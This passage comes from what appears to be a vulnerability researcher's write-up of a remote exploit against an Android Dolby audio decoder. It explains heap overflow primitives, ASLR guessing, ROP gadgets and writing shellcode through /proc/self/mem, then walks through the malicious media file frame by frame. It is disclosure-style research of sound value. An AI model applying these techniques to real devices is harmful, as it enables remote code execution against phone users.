There is a small ASLR problem with this step. As mentioned above, the dynamic buffer is allocated at a pointer with the format 0x000000XXXXXXY0a0, with X and Y being bits randomized by ASLR. The desired value to be written to is 0x000000XXXXXXY065. But remember, the skip buffer is actually at an offset of 0x1000 from the address the skip pointer references. So to perform the write, the skip pointer needs to be set to 0x000000XXXXXXZ065, where Z is one less than Y. This means the exploit needs to overwrite the nibble Y, and therefore know the value of Y, which is randomized by ASLR.
I did an experiment on a Pixel to see how this value was randomized and it seemed fairly even.
So the only option here is to guess this value, which means this exploit would work 1 out of every 16 times. This isn’t prohibitive, though, as an attacker could send the exploit repeatedly until it works, and if the heap nibble value is wrong, the decoding process crashes and respawns after roughly three seconds, which means the exploit would succeed on average in 24 seconds.
My exploit assumes the nibble value is 3. With this, and the shifting of the scudo heap header described above, it’s possible to insert an EMDF container before the heap header and use the leak capability of the bug to copy it over the skip pointer, then continue the copy to set the heap length. The heap length ends up being overwritten by audio data from early in the dynamic buffer (bit allocation pointers to be specific), which for the syncframe I used, is a value of 0x77007700770077.
Controlling PC
Now everything is ready to go: we can write an EMDF container with roughly 2070 EMDF payloads into the dynamic buffer, and when it's processed, ~0x28000 bytes of the evo heap get allocated and the final payload overwrites the function pointer at 0x8a410. Unfortunately, this didn't work.
It turns out that there are some other fields after the heap length in the static buffer.
To understand what these are, and why they are causing problems, we need to look more closely at how evo memory is allocated when EMDF payloads are processed. In highly simplified pseudocode, it works something like this.
```c
int num_payloads = 0;
while (true) {
    int error = evo_parse_payload_id(&reader, &payload_id);
    if (payload_id == 0 || error)
        break;
    num_payloads++;
    error = evo_parse_payload(reader, payload_id, 0, 0, &payload, 0); // allocates no memory
    if (error)
        break;
}
void** payload_array = evo_malloc(evo_heap, 8 * num_payloads, 8 * array_extra);
for (int i = 0; i < num_payloads; i++) {
    payload_array[i] = evo_alloc(88, 0);
}
reader.seek(0);
for (int i = 0; i < num_payloads; i++) {
    int error = evo_parse_payload_id(&reader, &payload_id);
    if (payload_id == 0 || error)
        break;
    error = evo_parse_payload(reader, payload_id, evo_heap, 0, payload_array[i], 0);
    if (error)
        break;
}
```

Within the second call to `evo_parse_payload`, a single allocation (the same one which can overflow when the bug occurs) is performed as follows:

```c
void* payload_mem = evo_alloc(payload_size, payload_extra);
```

At a high level, this code counts the number of EMDF payloads, allocates an array of that size to hold pointers to a struct for each payload, allocates a struct to represent each payload and sets the corresponding pointer in the array, then reads each EMDF object into its payload struct, optionally allocating payload memory if it contains payload bytes.
Two fields from the static buffer appear in the code above: `array_extra` and `payload_extra`. Both are integrator-configurable parameters that cause specific calls to `evo_alloc` to allocate extra memory.

So why does this cause my attempt to overwrite the function pointer in the static buffer to fail? When the decoder processes the EMDF container with a large number of payloads, it starts to allocate memory outside of the evo heap, because the heap length was overwritten with a very large size. The first evo heap memory allocated is the `payload_array`, an array of pointers that are later set to 88-byte evo heap allocations, one for each payload. With 2070 EMDF payloads, this array is very large, 0x40B0 bytes. It overlaps `payload_extra` and many other fields in the static buffer, setting them to pointer values. For fields that are interpreted as integers, like `payload_extra`, the end result is that they now contain numeric values that are very large.
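The array size is easy to verify against the pseudocode above (8 bytes per payload pointer; the 2070-payload count is the one used in this exploit):

```c
#include <stdio.h>

int main(void) {
    /* One 8-byte pointer per EMDF payload, as allocated for payload_array above. */
    unsigned long long num_payloads = 2070;
    printf("payload_array size: 0x%llX bytes\n", 8 * num_payloads); /* 0x40B0 */
    return 0;
}
```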
Soon after `payload_extra` is overwritten, `evo_parse_payload` is called, which attempts the allocation:

```c
void* payload_mem = evo_alloc(payload_size, payload_extra);
```

The allocation size is calculated by adding `payload_size + payload_extra` (with an integer overflow check) before the buggy addition of alignment padding that leads to the vulnerability occurs. Since pointers are tagged on Android, this will end up being something like:

```c
total_size = payload_size + 0xB400007XXXXXXXXX;
```

Meanwhile, the heap length was overwritten to be 0x77007700770077, which is always smaller than `total_size`, so this allocation fails. Even worse, the overwritten `payload_extra` persists across syncframes, meaning that no `payload_mem` allocation will ever succeed again. This prevents the bug from ever triggering again, as it requires a successful allocation, so there is no possibility of correcting these values in the static buffer.
But maybe it isn't necessary to ever trigger the bug again, as the skip pointer is one of the many fields that gets overwritten by the huge `payload_array` allocation, causing it to point into the static buffer, above the evo heap. I'm going to skip over some details here, because I ended up not using this strategy in the final exploit, but by writing data to the altered skip pointer, it was possible to overwrite the function pointer, which demonstrated that this vulnerability could set the program counter!

Non-contiguous Overwrites
Controlling the PC showed this bug has excellent exploitability, but the above strategy had a serious downside: it prevented the bug from being triggered again, so I could only perform one overwrite, which would make achieving shellcode execution challenging. So my next step was to find a way to perform multiple non-contiguous writes to the static buffer.
When setting the PC, the unavoidable corruption of `payload_extra` prevented future overwrites, but I eventually realized that I could use the ability to set this field to my advantage.

The layout of allocations on the evo heap is as follows:
If an EMDF container contained two EMDF payloads, the data for the second payload would be allocated at `num_payloads × 96 + payload_1_size + payload_extra`. This allows `payload_extra` bytes to be allocated in the static buffer, but not overwritten by the payload. Since the length and contents of payload data are controllable by the attacker, it would be possible to write basically any data at any relative location in the static buffer if I could find some way to overwrite `payload_extra` with controlled data. The fact that `payload_1_size` is also set from syncframe data makes this even more convenient. Since all the writes this exploit requires are fairly close to each other in memory, `payload_extra` only needs to be written once, such that `heap_base + num_payloads × 96 + payload_1_size + payload_extra` is equal to the `X0` parameter of `DLB_CLqmf_analysisL` (more on why this is a good choice later). Then, by modifying `payload_1_size`, the address of individual writes can be shifted by that many bytes. For example, if `payload_1_size` is 14 × 8, the function pointer in the static buffer discussed above will be overwritten.
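A minimal sketch of this targeting arithmetic, using the formula and the entry-14 example from the text; the concrete base addresses are illustrative, not real values:

```c
#include <stdio.h>

/* Where the second payload's data lands on the evo heap, per the formula above. */
static unsigned long long write_address(unsigned long long heap_base,
                                        unsigned long long num_payloads,
                                        unsigned long long payload_1_size,
                                        unsigned long long payload_extra) {
    return heap_base + num_payloads * 96 + payload_1_size + payload_extra;
}

int main(void) {
    unsigned long long heap_base    = 0x1000;  /* illustrative */
    unsigned long long num_payloads = 2;
    unsigned long long x0           = 0x4000;  /* illustrative X0 of DLB_CLqmf_analysisL */

    /* payload_extra is chosen once so that, with payload_1_size == 0, the write
     * lands exactly on the X0 parameter of DLB_CLqmf_analysisL. */
    unsigned long long payload_extra = x0 - heap_base - num_payloads * 96;

    /* Individual writes are then shifted by adjusting payload_1_size. With
     * payload_1_size = 14 * 8, the write hits entry 14, the direct-call function pointer. */
    printf("write lands at X0 + 0x%llx\n",
           write_address(heap_base, num_payloads, 14 * 8, payload_extra) - x0); /* 0x70 */
    return 0;
}
```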
Overwriting payload_extra

Unfortunately, the method used for overwriting the heap length is not sufficient to overwrite `payload_extra` as well, and the corruption that occurred while gaining PC control did not provide adequate control of the values overwriting `payload_extra` to perform the steps above. Remember, the heap length was overwritten by audio data in the dynamic buffer that happened to be written at an address soon after the static buffer's scudo heap header, and `payload_extra` was overwritten by a pointer. For just extending the heap length, setting the value to 'random garbage' was enough, but for multiple overwrites via `payload_extra`, a specific value is needed.

A simple solution would be to use WRITE DYNAMIC to write the data after the heap header to the needed value, but this isn't possible, because this address is written by the decoder while decoding a portion of the audio blocks called bit allocation pointers (baps), between when attacker-controlled data is written and when it is processed by the next syncframe. So even if the needed values are written with WRITE DYNAMIC, they are overwritten before they can be used to set `payload_extra` and nearby fields. I tried stopping the write from happening by including erroneous data in the syncframe that prevented baps from being written, but this also stopped EMDF data from being processed. I also tried altering an audio block to write controlled data in this location, but the possible values of baps are fairly limited, only low 16-bit integers.

I eventually wondered if it would be possible to get the scudo heap to write an 'inactive' header, i.e. one that contains pointer values, but isn't currently in use. I experimented with scudo, and discovered that if a secondary chunk is the first one of that size ever allocated by a process (like the dynamic buffer is), its previous pointer will point to itself, and if the previous pointer is partially overwritten (for example, so the last two bytes are 0x5000 instead of 0x3000), the next time the chunk is allocated, the address returned by the allocator will be at the 0x5000 address, but the scudo header at 0x3000 will not be cleared. This only works because the dynamic buffer is the only buffer anywhere near its size that is allocated by the process; otherwise, there would be a risk that this buffer would be allocated again, leading to memory corruption that could cause a crash before the exploit is finished running.
Since the decoder needs to be reset to cause the dynamic buffer to be reallocated, implementing this required adding a third media file to the exploit, but this isn’t a big cost in a fully-remote exploit, as three attachments can easily be added to the same SMS or RCS message. Now the exploit has three files:
- first.mp4 -- Using WRITE DYNAMIC, writes `dynamic_base + 0x3061` to 0x48, causing the dynamic buffer to be reallocated at `dynamic_base + 0x4800` when second.mp4 is loaded
- second.mp4 -- Using WRITE DYNAMIC, writes `dynamic_base + 0x4861` to 0x50, causing the dynamic buffer to be reallocated at `dynamic_base + 0x5000` when third.mp4 is loaded
- third.mp4 -- contains the rest of the exploit
Note that `dynamic_base` is the location of the dynamic buffer with the lower two bytes cleared, i.e. `dynamic_buffer & 0xFFFFFFFFFFFF0000`. When the ASLR state needed for the exploit to work is correct, the dynamic buffer is at `dynamic_base + 0x3000`.
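A minimal sketch of the byte arithmetic behind the first two files, assuming (as the offsets above imply) that the secondary header's prev pointer sits at `dynamic_base + 0x3060` and initially points to the chunk itself, and that the target is little-endian:

```c
#include <stdio.h>

int main(void) {
    unsigned long long dynamic_base = 0x7f12340000ULL;   /* illustrative ASLR value */
    unsigned long long prev_ptr = dynamic_base + 0x3000; /* assumed self-referencing prev pointer */

    /* first.mp4: write the single byte 0x48 at dynamic_base + 0x3061,
     * i.e. the second-lowest byte of prev_ptr (little-endian assumed). */
    ((unsigned char *)&prev_ptr)[1] = 0x48;
    printf("after first.mp4:  reallocated at 0x%llx\n", prev_ptr); /* ...4800 */

    /* second.mp4 repeats the trick on the new header's prev pointer. */
    ((unsigned char *)&prev_ptr)[1] = 0x50;
    printf("after second.mp4: reallocated at 0x%llx\n", prev_ptr); /* ...5000 */
    return 0;
}
```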
Now, there is a scudo heap header at `dynamic_base + 0x4800` that is not actively in use and does not get overwritten by baps, which can be used to create an EMDF container that will overwrite `payload_extra`. But there is one problem. I explained earlier that, when filling a buffer using DYNAMIC WRITE, the exploit needs to perform overlapping writes downwards, because the next EMDF container, which is needed to move the skip pointer for the next step, overwrites some data at the start of the write. This doesn't matter when writing a long page of data, because the next write can fix the previous one, but it does in this case. The layout of the heap header is as follows:

I needed to write specific data to exactly offset 0xc8, but couldn't corrupt the 'prev chunk ptr' because it was needed to overwrite the skip pointer during the copy. There are 0x60 bytes between these, which is not enough for a payload that moves the skip pointer.
So I needed a new primitive. Thankfully, the way the decoder handles the EMDF syncword provides this. Basically, once skip data is copied into the skip buffer, the buffer is searched for the syncword ('X8'), and EMDF container parsing starts after the syncword. So it is possible to put some data before the syncword, and that gets written to the skip pointer, then put the container that moves the skip pointer after that. This allows the data to be written to the skip pointer, and then the skip pointer to be moved in a single syncframe, so that data doesn't get corrupted by a future skip pointer write. I will call this primitive WRITE DYNAMIC FAST. There are two downsides of this primitive compared to WRITE DYNAMIC. One is that since the EMDF container that moves the skip pointer and the data written are in the same syncframe, a smaller amount of data can be written. The other is that it is more difficult to debug. In a WRITE DYNAMIC syncframe, the address written to is always at the same offset, so it is easy to visually inspect many syncframes and determine where they are writing, but this is not the case with WRITE DYNAMIC FAST. So, my exploit uses WRITE DYNAMIC wherever possible, and only uses WRITE DYNAMIC FAST for writes that can't be accomplished with WRITE DYNAMIC.
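Conceptually, a WRITE DYNAMIC FAST syncframe's skip data has the layout sketched below. The EMDF encoding details are placeholders, not the real bitstream format; only the ordering reflects the description above:

```c
#include <string.h>

static unsigned char skip_data[256];

/* Conceptual layout of a single WRITE DYNAMIC FAST syncframe's skip data. */
void build_write_dynamic_fast(const unsigned char *payload, size_t payload_len,
                              const unsigned char *move_container, size_t container_len) {
    size_t off = 0;
    /* 1. Bytes before the syncword: copied to the current skip pointer,
     *    but ignored by the EMDF parser. This is the actual write. */
    memcpy(skip_data + off, payload, payload_len);
    off += payload_len;
    /* 2. The syncword; EMDF parsing starts after it. */
    skip_data[off++] = 'X';
    skip_data[off++] = '8';
    /* 3. An EMDF container that moves the skip pointer for the next step,
     *    so the bytes written in step 1 are not corrupted later. */
    memcpy(skip_data + off, move_container, container_len);
}
```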
With this primitive, I could create a syncframe that overwrites the skip pointer with a valid pointer to the dynamic buffer, then overwrites the heap length and `payload_extra`. This created a new primitive, which I will call WRITE STATIC. This allows a write to any offset in the static buffer larger than 0x63c30 relative to the static buffer's base!

Calling Controllable Functions
Now that I had the ability to perform multiple writes to the static buffer, it was time to figure out a path to shellcode execution. This required analyzing how the function pointers in the static buffer are called. It happens in the following function:
```c
void* DLB_CLqmf_analysisL(void **static_buffer, __int64 *output_index, __int64 in_param)
{
    // static_buffer is the static buffer at offset 0x8a3c8
    ...
    int loop_times = *((int*)static_buffer + 5);
    int index = *(_DWORD *)static_buffer;
    do {
        index_val = *output_index++;
        param_X0 = static_buffer[12];
        param_val = param_X0 + 8 * index;
        (static_buffer[14])(param_X0, static_buffer[5], static_buffer[1], static_buffer[7], in_param);
        result = dlb_forwardModulationComplex(
            param_X0, index_val, param_val, *static_buffer,
            static_buffer[13], static_buffer[8], static_buffer[9]);
        index = *(unsigned int *)static_buffer;
        --loop_times;
        ...
    } while (loop_times);
    return result;
}
```

The function `dlb_forwardModulationComplex` contains the following condition:

```c
if (a7) {
    result = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))*a7)(a3, a1, a4);
}
```

This function's behavior is extremely promising with regards to exploitation. It reads a function pointer and parameters out of memory that can be written with WRITE STATIC, then calls the function pointer with those parameters. There is also an option to make an indirect function call using `dlb_forwardModulationComplex`, if there happens to be a situation where a pointer to a function pointer is available instead of the function pointer itself. Finally, the call is repeated a specific number of times, based on a controllable value read out of the static buffer. Combining `DLB_CLqmf_analysisL` with WRITE STATIC, I could partially overwrite function pointers to run ROP with controllable parameters.

What's the plan, (Seth and) Jann?
As I developed this exploit, Jann Horn asked several times how I was planning to get from ROP to code execution in the `mediacodec` context, as Android has several security features intended to make this step difficult. I put this off as a 'future problem', but I was now at a point where it needed to be solved.

Normally, my strategy would be to write a shared library to the filesystem and then call `dlopen` on it, or to write shellcode to a buffer and call `mprotect` with ROP to make it executable. SELinux prevented both of these. It turns out the mediacodec SELinux context does not have any allow rule that lets it open and write the same file, so `dlopen` was a non-starter. Additionally, mediacodec does not have execmem permissions, so making memory executable was also out. Making matters worse, `libcodec2_soft_ddpdec.so` makes limited calls to libc, so not very many functions were available for ROP purposes. For example, the library imports `fopen` and `fread`, but not `fwrite` or `fseek`.

Eventually, I got together with Jann Horn and Seth Jenkins to figure out a strategy to get from ROP to arbitrary instruction execution. Jann had the idea to write to `/proc/self/mem`. This procfs file allows any memory in a process to be overwritten for debugging purposes (i.e. to support software breakpoints), and could potentially be used to overwrite a function, and then execute it.
After investigating the `mediacodec` context's permissions, we came up with the following strategy:

- Map shellcode into memory using WRITE DYNAMIC
- Call `fopen` on `/proc/self/mem` many times, so a file descriptor number associated with `/proc/self/mem` can be easily guessed
- Call `pwrite` to write the shellcode to a function that can later be executed. (Note that `pwrite` is not imported by `libcodec2_soft_ddpdec.so`, but nothing else that can write to a file handle is either.)
Translating this sequence into ROP calls made by WRITE STATIC was more difficult than expected. One problem was that partially overwriting the function pointers in `DLB_CLqmf_analysisL` provided less functionality than I'd imagined. If you recall, `DLB_CLqmf_analysisL` makes two function calls that can be overwritten. The first is a direct call to `analysisPolyphaseFiltering_P4` at 0x26BDEC (note this isn't symbolized in the Android version of the library). The second is an indirect call to `DLB_r8_fft_64` via a pointer at offset 0x2A7B60.

The upper nibble of the second byte of where these functions are loaded is randomized by ASLR on Android. I tested this, and the distribution appeared fairly uniform.
So my only options were to use ROP gadgets that involve only overwriting the first byte of the function pointers, or add additional unreliability to the exploit. The available gadgets weren’t promising, so I decided to just guess this offset in my exploit, which adds another 1/16 probability, meaning the exploit will work one out of 256 times total. Considering the decoder process takes three seconds to respawn, this means the exploit would take on average around six minutes to succeed, which isn’t prohibitive.
Guessing this nibble expands the available ROP gadgets to a span of 0xFFFF bytes, and it's possible to shift this span somewhat, depending on what value the exploit guesses this nibble to be. Still, this is only about 5% of the 1.3 MB of code in `libcodec2_soft_ddpdec.so`. For the indirect call, 0xFFFF spans almost the entire export table, as well as the global offset table (GOT), so there are some options there, but the library imports only about 40 functions from libc.

But it wasn't hopeless. For one, it is possible to call `memcpy` with these limitations, and if the parameters are unmodified, `dst` is a location in the dynamic buffer and `src` is a location in the static buffer. Also, there was a promising ROP gadget in the accessible range:

```
0x000000000026ae38 : ldr w8, [x1] ; add w8, w8, #0x157 ; str w8, [x1] ; ret
```

I will call this the "increment gadget".
With this, I had a plan:

- Change the indirect call to the `fopen` pointer in the GOT, and call it several times on `/proc/self/mem`
- Change the indirect call to `memcpy`, and copy the `fopen` GOT entry to the dynamic buffer
- Set the `dst` parameter of `memcpy` to the location of the GOT pointer in the dynamic buffer and call it again, causing a pointer to the `fopen` function in libc to be copied to the dynamic buffer
- Use DYNAMIC WRITE to overwrite the last byte of the function pointer, so the distance between the pointer and `pwrite` is a multiple of 0x157
- Call the increment gadget over and over to increment the function pointer in the dynamic buffer by 0x157 until its value is `pwrite`
- Call `pwrite`
- Profit?
This plan obviously glosses over a lot, most of which will be explained in the next section, but it is the plan I wrote up at the time.
One immediate question is "does the math work"? It seems to. In the version of the library I looked at, `fopen` is at 0x92E90 and `pwrite` is at 0xDD6C0. A one-byte overwrite could change a `fopen` pointer to 0x92E4A, then:

0x157 × 890 + 0x92E4A = 0xDD6C0
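As a sanity check, the arithmetic can be verified directly; the addresses are the ones quoted above for this particular libc version, and other versions would need a different last-byte value and iteration count:

```c
#include <assert.h>
#include <stdio.h>

int main(void) {
    /* Addresses quoted above for the libc version examined. */
    unsigned long long fopen_addr  = 0x92E90;
    unsigned long long pwrite_addr = 0xDD6C0;

    /* Step 1: a one-byte overwrite of the copied fopen pointer's low byte. */
    unsigned long long ptr = (fopen_addr & ~0xFFULL) | 0x4A;   /* 0x92E4A */

    /* Step 2: the increment gadget adds 0x157 per call; count the calls needed. */
    assert((pwrite_addr - ptr) % 0x157 == 0);
    printf("increments needed: %llu\n", (pwrite_addr - ptr) / 0x157); /* 890 */
    return 0;
}
```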
Another question is whether this math would work generally, even on devices that have libc compiled with different offsets. I believe it would. In each version of libc, there are at least four call locations that will end up calling `pwrite`: `pwrite`, `pwrite`'s PLT, `pwrite64` and `pwrite64`'s PLT. If those don't work, there are combinations of `seek` and `write` or `fseek` and `fwrite`. Worst case, the exploit could change the GOT entry that's read, so the math starts with a different function pointer than `fopen`. There are a very large number of possibilities and more than one is likely to work on every libc compilation.

The Exploit
Now, it was time to write the third file of the exploit. This turned out to be fairly complicated, with some unexpected problems. In order to explain these, this section will go through the third file of the exploit, one syncframe at a time. You can follow along here. Note that files whose names begin with numbers, for example 10_write_x0, contain the actual syncframe data for that syncframe, while files with names like make_10_write_x0.py contain Python that generates the frame, often created with Gemini. Files with no corresponding Python were either hand-forged or exact copies of previous syncframes. Files with the suffix _special were generated with the corresponding Python, then altered by hand. The syncframes can be combined into a single MP4 file with correct checksums by running combine_frames.py.

longmem
The third exploit MP4 starts with the 36 syncframes in the longmem directory, containing the shellcode that the exploit eventually runs. The shellcode is copied to the dynamic buffer at descending addresses using DYNAMIC WRITE. As the exploit progresses, it performs actions that break DYNAMIC WRITE, so it’s easiest to get this into memory now.
1_adjust_write_heap

This syncframe sets the skip pointer to `dynamic_base + 0xF000`.

2_adjust_write_heap_special
This syncframe uses DYNAMIC WRITE FAST to write 'wb' and "/proc/self/mem" to the address above, so they are available as parameters for a future `fopen` call, then moves the skip pointer to `dynamic_base + 0xD000`, so they aren't immediately corrupted.

3_adjust_write_heap

This syncframe sets the skip pointer to `dynamic_base + 0x48c8`, an offset that will correspond to the evo heap length and `payload_extra` once the memory is copied. (In hindsight, this could have been done in the previous frame, but too late now.)

4_adjust_write_heap_special
This syncframe uses DYNAMIC WRITE FAST to write the memory at the offset corresponding to the evo heap length to 0xFFFFFFFFFFFFFFFF and the offset corresponding to `payload_extra` to 0x28530. It then sets the skip pointer to `dynamic_base + 0x473a`.

5_do_heap_write

This syncframe writes the start of an EMDF container to the address set in the previous frame, so that the data written by 3_adjust_write_heap, 4_adjust_write_heap_special and this syncframe together form a valid EMDF container, which is then parsed, triggering the bug and setting the heap length to 0xFFFFFFFFFFFFFFFF and `payload_extra` to 0x28530. This makes the WRITE STATIC primitive available, but also makes WRITE DYNAMIC and DYNAMIC WRITE FAST no longer function, as evo heap allocations no longer take up the same amount of space on the heap.

6_write_pc
To understand this and future syncframes, it's important to understand the functionality of WRITE STATIC in a bit more detail. The memory this primitive can write, which is eventually the X0 parameter to `DLB_CLqmf_analysisL`, is laid out as follows:

The function pointer for the direct call is available to be overwritten, as are its parameters, ARM64 registers X0 through X3. The indirect function parameters are also calculated from values in this structure, which I will explain in more detail later.
Each 64-bit slot can be considered an 'entry' that needs to be individually overwritten in order to do non-contiguous partial overwrites. WRITE STATIC can alter a single entry per syncframe. Unfortunately, `DLB_CLqmf_analysisL` also executes once per syncframe, which can cause crashes or undesired behavior if the exploit is in the process of setting parameters when the call occurs.
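Since the layout diagram does not survive here, the entries the exploit touches, pieced together from the walkthrough below, are roughly as follows. Anything not mentioned in the text, including the X3 offset, is a reconstruction rather than the decoder's actual structure:

```c
/* Reconstructed sketch of the 64-bit 'entries' in the structure passed as X0
 * to DLB_CLqmf_analysisL. Only entries referenced in this writeup are listed. */
enum qmf_entry {
    ENTRY_INDEX             = 0,  /* 'index': indirect call X0 = direct_call_X0 + 8 * index        */
    ENTRY_DIRECT_CALL_X2    = 1,
    ENTRY_LOOP_COUNT        = 2,  /* how many times the calls run per invocation                    */
    ENTRY_DIRECT_CALL_X1    = 5,
    ENTRY_DIRECT_CALL_X3    = 7,  /* inferred from static_buffer[7] in the decompiled direct call   */
    ENTRY_INDIRECT_FPTR_PTR = 9,  /* pointer to a function pointer, e.g. a GOT entry                */
    ENTRY_INDIRECT_X1       = 10, /* later pointed at the "wb" string for the fopen call            */
    ENTRY_DIRECT_CALL_X0    = 12,
    ENTRY_DIRECT_CALL_FPTR  = 14, /* the directly called function pointer                           */
};
```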
This syncframe sets `direct_call_fptr` at entry 14 to a gadget that contains only the instruction `ret`, by doing a partial overwrite of the existing pointer. This prevents the direct function call from causing unexpected behavior.

7_garbage
Executing any frame with a valid EMDF header caused a crash after the previous frame, due to an out-of-bounds `memset`. Based on its parameters, this call is obviously intended to zero the evo heap, but since the heap length is now larger than the static buffer, it writes out of bounds. I performed a minimal analysis of what triggers this call and discovered that it requires processing two syncframes containing EMDF containers in a row, so I added in a syncframe that contains random invalid data to reset this. This 'garbage' syncframe is now required after every valid syncframe to avoid crashes. I will omit it as I continue through the exploit, but note that every future frame is even-numbered, because all the odd-numbered frames are 'garbage'.

8_write_str_str
Similar to syncframe 6, it is necessary to overwrite the indirect function pointer at entry 9 to avoid crashes as parameters are set; however, it is not possible to use ROP, as the entry needs to be set to a pointer to a function pointer. This syncframe sets entry 9 to the GOT entry pointing to `strstr` by doing a partial overwrite. While this isn't ideal, for the time being, X0 and X1 of the indirect call will always be pointers, and `strstr` doesn't modify any memory, so running it repeatedly won't cause crashes or other problems.

10_write_x0
This syncframe prepares the X0 parameter for the indirect call to `fopen`. For this call, X0's value will be the pointer at entry 12 (`direct_call_X0`) plus an offset calculated from entry 0 (`index`). The entire calculation is:

```c
indirect_call_x0 = direct_call_X0 + 8 * index;
```

In syncframe 1, "/proc/self/mem" was already loaded into the dynamic buffer, and this syncframe sets `index` to 1, so X0 references this string, 8 bytes away from the string 'wb'.

12_write_x1
This syncframe partially overwrites entry 10, which is currently a pointer to the dynamic buffer, so that its value is `dynamic_base + 0xF000`, making it point to the string 'wb'.

14_write_fopen
This syncframe partially overwrites entry 9, so the indirect function pointer now references `fopen`. `fopen` will immediately be called four times, the default value of `loop_count`.

16_garbage to 23_garbage
The exploit now processes a few garbage syncframes to run `fopen` repeatedly and 'spray' the file handle so it can be guessed. This works because the UDC process opens very few files, so after a certain number of opens the handle values are predictable.

24_write_str_str
Returns entry 9 (the indirect function pointer) to `strstr`, so `fopen` stops being called.

26_write_x2
This syncframe sets `direct_call_X2` (entry 1) to 0xb8 in preparation for a call to `memcpy`.

28_write_x0
This syncframe partially overwrites the dynamic buffer pointer in `direct_call_X0` (entry 12) to `dynamic_base + 0xEC00`, in preparation for a call to `memcpy`.

30_loop_count
This syncframe sets the `loop_count` in entry 2 to 1, so future function calls do not execute multiple times per syncframe.

32_memcpy
This syncframe sets the direct function pointer (entry 14) to a `memcpy` gadget at 0x26cc2c, which is then called, causing the static buffer to be copied to the dynamic buffer, including an indirect pointer to `strstr`, set at entry 9 above. Note that the copy will occur every syncframe until entry 14 is overwritten again.

34_write_x0
The previously-set value of `direct_call_X0` was a dummy value, to keep the copy away from the skip buffer while the previous, especially large, EMDF container was being processed. This syncframe sets it to the actual copy destination, `dynamic_base + 0x5F83`.
36_zero_page and 38_copy_x1_special
The next two syncframes copy the newly written `strstr` GOT entry pointer to `direct_call_X1` using the leak capability of the vulnerability, so it can be the `src` parameter of the next `memcpy`. 36_zero_page writes zeros, followed by the end of an EMDF container, to the skip pointer.

The `memcpy` then occurs, copying the GOT pointer into the middle of the EMDF container. 38_copy_x1_special writes the head of the EMDF container to the skip pointer, then the container is parsed, causing `direct_call_X1` (entry 5) to be set to the GOT pointer.

40_write_x0 and 42_write_x0
Syncframe 40 sets `direct_call_X0` (entry 12) to `dynamic_base + 0xEF00`. `memcpy` is then called, causing a direct pointer to `strstr` to be copied to that address. Syncframe 42 sets it to `dynamic_base + 0x6043`, so the copied memory doesn't get corrupted, and to set up the next `memcpy` call.

44_write_x2, 46_write_scf, 48_zero_page and 50_write_x3_special
Though it wasn't strictly necessary at this point, I wanted to set `direct_call_X3` to `strstr`, so it would be available as `offset`, the fourth parameter to the eventual `pwrite` call. This made sense because the pointer was currently available in the dynamic buffer, and all other direct calls needed by the exploit had fewer than four parameters. Flash forward to the future: this was a bad idea.

The `offset` parameter specifies the location `pwrite` writes to, which for `/proc/self/mem` in this exploit is the address of a function that will be overwritten with shellcode. `strstr` seemed perfect, because I could already make controlled calls to it, and it otherwise doesn't get called a lot, but when I ran the finished exploit, it didn't work, because `getpid`, `munlock` and several other frequently-called functions were located immediately after it in libc. They usually got called first, causing the exploit to jump into the middle of the shellcode.

It was easiest just to use `memcpy` to copy a different function pointer, and after some testing, I selected `__stack_chk_fail`, as it doesn't get called during normal operation and the functions after it in libc aren't used by the UDC either. So this combination of syncframes uses the same trick as was used to copy the `strstr` GOT entry into `direct_call_X1` to copy a pointer to `__stack_chk_fail` into `direct_call_X3`. Note that this only takes one 'round' of using the leak capability to copy a pointer, versus two for `strstr`, because I was able to partially overwrite the pointer to the `strstr` GOT entry in `direct_call_X1` so it pointed to the `__stack_chk_fail` GOT entry, so I didn't need to copy the static buffer a second time.

52_set_pc_back
This syncframe sets the direct function call back to the ret gadget, so it stops calling `memcpy`.

54_write_skip, 56_write_x1_end_special and 58_write_x1_start_special
When starting this exploit, I genuinely believed it would be possible to get shellcode execution without WRITE DYNAMIC once WRITE STATIC was unlocked. This turned out to be wrong. In the plan I wrote up for the exploit, I missed the fact that `direct_call_X1` was set to the GOT at this point in the exploit, but needed to be set to the dynamic buffer.

Some nice pointers to the dynamic buffer were already in the dynamic buffer from when I had copied the static buffer there to get the address of the GOT, and I could use the same trick to copy one to `direct_call_X1` that I'd used to copy the other pointers, but I'd need to move the skip pointer to their address and write to it. I decided at this point the easiest path forward would be to regain the WRITE DYNAMIC primitive.

This was really just a math problem: the original WRITE DYNAMIC primitive would allocate a lot of EMDF payloads to exhaust the heap, then trigger the buffer overwrite capability to alter the skip pointer; with `payload_extra` overwritten, this would fail due to an integer overflow check failing when it is added to the payload size. But it's not actually necessary to trigger the vulnerability once the heap length is overwritten, as the evo heap no longer accurately checks whether heap writes are out of bounds.

As a refresher, the evo heap is laid out as follows:
The new WRITE DYNAMIC allocates exactly the right number of payloads so that the combined size of the pointer array and the payload structs lines up exactly with the skip pointer; the first payload's data then overlaps the pointer and can be used to overwrite it.
These syncframes use a series of WRITE DYNAMIC and WRITE DYNAMIC FAST calls to set `direct_call_X1` to the dynamic buffer.

60_write_skip, 62_write_single_byte and 64_move_skip
The first two syncframes use DYNAMIC WRITE to overwrite the final byte of the pointer to `strstr`, so it is a multiple of 0x157 away from `pwrite`. The final syncframe moves the skip pointer to another address so it doesn't write the byte a second time.

66_write_index
The exploit is about to call the increment gadget a large number of times, which will also increment the variable `index` at entry 0 in `DLB_CLqmf_analysisL`. This syncframe sets its value to zero, so that these future increments don't lead to reads out of bounds.

68_loop_count
This syncframe sets the `loop_count` in entry 2 to 0x7B, so that the increment gadget runs the correct number of times. Note that `DLB_CLqmf_analysisL` will run twice, causing the gadget to run 0xF6 times.

70_write_x1
`direct_call_X1` currently points somewhere in the dynamic buffer. This syncframe makes it point exactly to the modified pointer to `strstr`.

72_inc_157
This syncframe sets the direct function pointer to the increment gadget, which is then called 0xF6 times, causing the function pointer in the dynamic buffer to point to `pwrite`.

74_set_pc_back
Sets the direct call pointer back to the ret gadget, so incrementing stops.
76_set_malloc
The indirect function pointer is currently set to `strstr`. This will become a problem as its parameters are prepared for calling `pwrite`, as `pwrite`'s first parameter is a file handle (i.e. an integer), which will crash as the first parameter of `strstr`. This syncframe sets the indirect function pointer to `malloc`, as its GOT entry is within range and the call will succeed with a single integer parameter.

78_write_x0
This syncframe writes `direct_call_X0` with 40, the estimated handle to `/proc/self/mem`.

80_write_x1
This syncframe partially overwrites `direct_call_X1` so it points to the shellcode in the dynamic buffer.

82_write_x2
This syncframe writes `direct_call_X2` with the integer length of the shellcode.

84_write_end_special and 86_write_start_special
